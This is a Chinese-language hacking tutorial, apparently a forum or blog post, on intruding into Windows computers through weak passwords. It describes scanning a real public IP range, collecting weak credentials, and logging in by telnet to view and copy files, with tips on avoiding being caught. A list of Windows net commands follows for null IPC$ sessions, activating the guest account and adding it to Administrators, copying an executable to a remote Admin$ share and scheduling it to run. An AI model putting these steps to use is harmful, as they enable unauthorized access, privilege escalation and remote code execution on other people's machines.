系统漏洞入.侵

系统漏洞是指操作的编写存在一些缺陷或者是错误，而黑客就可以通过这个系统漏洞**计算机。
今天来讲讲系统漏洞的利用。
下载一个啊D网络工具包（这个是国内比较著名的扫描工具，功能齐全），然后记住要用外网，或者给内网做一个映射。
首先先选择IP（我填写的是218.76.40.1至218.76.40.225），然后要填写端口了。

在这里讲解一下端口普及知识
第一种是公认端口：端口号为0――1023。这些通常是绑定着一些服务的。像80端口就分配给了WEB的访问（www服务），而21端口则是分配给了FTP的这些服务。
第二种是注册端口：端口号为1024――49151。这里大家不要以为是注册账号的端口，这个完全是两码事。这种端口通常用于一些安装软件的服务，像QQ之类的软件。qq的端口我记得是4000.
第三种是动态/私有端口：端口号为49152――65535。这里我很悟不透，因为从1024之后就属于动态/私有端口了，不知道为什么这里还要再分类，只知道它的一个例外是RPC是配对着32768。

讲解完端口之后找到你要填写对方PC的端口号，但是这点你要注意，如果你要通过你填写的端口而连接对方的计算机，那么你也要开通自己的那个端口。
端口的打开方法：http://wenku.baidu.com/view/614fc470a417866fb84a8e6d.html

扫到了以后选择开始查找，这是在查找对方的账号和密码而获取若口令，像密码为123456789，这种密码就叫做弱口令，表示密码很简单。

假设我找到了192.153.1.101这个ip的账号和密码，账号为admin，密码为123。找到了以后，打开CMD指令（什么是CMD指令这个就不用说了吧，要是不知道的上网查），输入“telnet 192.153.1.101”，然后按下回车键，输入账号和密码。**成功！！！

接下来你就可以运用CMD指令对对方机子的文件进行查看，拷贝，或者添加及运行。比如输入“dir/w”，这个是查看C盘目录的指令。

附：这里要说明一下，现在XP及WIN7的计算机很难用这个方法破解了，因为微软随时发布着补丁，用补丁把系统漏洞补上之后，那个漏洞也就无用了，但是2000的机子一扫一大堆都存在漏洞。还有就是大家**的时候要好好防御自己的电脑，防止被抓。另外，我们是红客，不是骇客，请勿对他人计算机进行破坏。

在web上copy的一些命令：
==================================================================
一些常用的DOS网络命令
==================================================================
net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录)
net share c$ /del 禁止C$共享
net use z: \\*.*.*.*\C$ 把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z：盘
net use c: /del 删除映射的c盘
net use * /del /y 删除全部
net start 显示本地主机当前服务
net start telnet 启动 Telnet 服务
net start Server 启动 Server 服务 (IPC$ 和共享要靠这个服务)
net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)!
net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$**)
net user 得到本地主机的用户列表
net user guest /active:yes 将停用的guest帐号激活(变为可用)
net user guest 888888 把 Guest 帐号的密码改为 888888
net localgroup Administrators guest /add 把 Guest 加到Administrators组中(这样你就有了超级权限了)
net view \\*.*.*.* 查看指定IP主机上的共享
nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表
net share 查看本地主机的共享资源(本地的默认共享也可以看到)
net use \\*.*.*.*\ipc$ "" /user:"" 建立空连接
telnet *.*.*.* 90 连接对方机子的telnet,端口为90
ipconfig 查看本机的IP信息
**ipc过程序命令
-----------------------------------------------
net use \\*.*.*.*\ipc$ "" /user:"Administrator" 建立用户名为 Administrator 密码为空的连接
copy server1.exe \\*.*.*.*\Admin$\system32 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内
net time \\*.*.*.* 查看远程主机的当前时间
at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务
netstat [-r] [-s] [-n] [-a]
参数含义：
-r 显示本机路由表的内容；
-s 显示每个协议的使用状态（包括TCP协议、UDP协议、IP协议）；
-n 以数字表格形式显示地址和端口；
-a 显示所有主机的端口号。
入侵